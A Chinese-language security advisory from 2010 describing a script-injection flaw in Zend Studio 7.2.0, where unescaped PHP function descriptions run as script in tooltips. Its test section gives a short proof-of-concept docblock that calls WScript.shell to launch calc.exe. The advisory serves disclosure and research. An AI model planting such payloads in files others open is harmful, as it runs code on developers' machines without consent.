Zend Studio函数描述脚本注入漏洞


发布日期:2010-07-12
更新日期:2010-07-13

受影响系统:
Zend Zend Studio 7.2.0
描述:
--------------------------------------------------------------------------------
Zend Studio是Zend Technologies开发的PHP语言集成开发环境。

Zend Studio没有对PHP函数的描述进行转义或htmlencode编码便在tooltip对话框中显示,用户受骗打开了特制的PHP文件并通过tooltip显示了恶意函数描述就会导致注入并执行恶意代码。

<*来源:saiy1986 (saiy1986@gmail.com)
 
  链接:http://secunia.com/advisories/40437/
        http://marc.info/?l=full-disclosure&m=127874100613413&q=p5
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

/**
* <script>new ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
*/
function a() {
}

然后打开函数a()的描述(键入a或移动鼠标)就会运行calc.exe。

建议:
--------------------------------------------------------------------------------
厂商补丁:

Zend
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zend.com/downloads

相关内容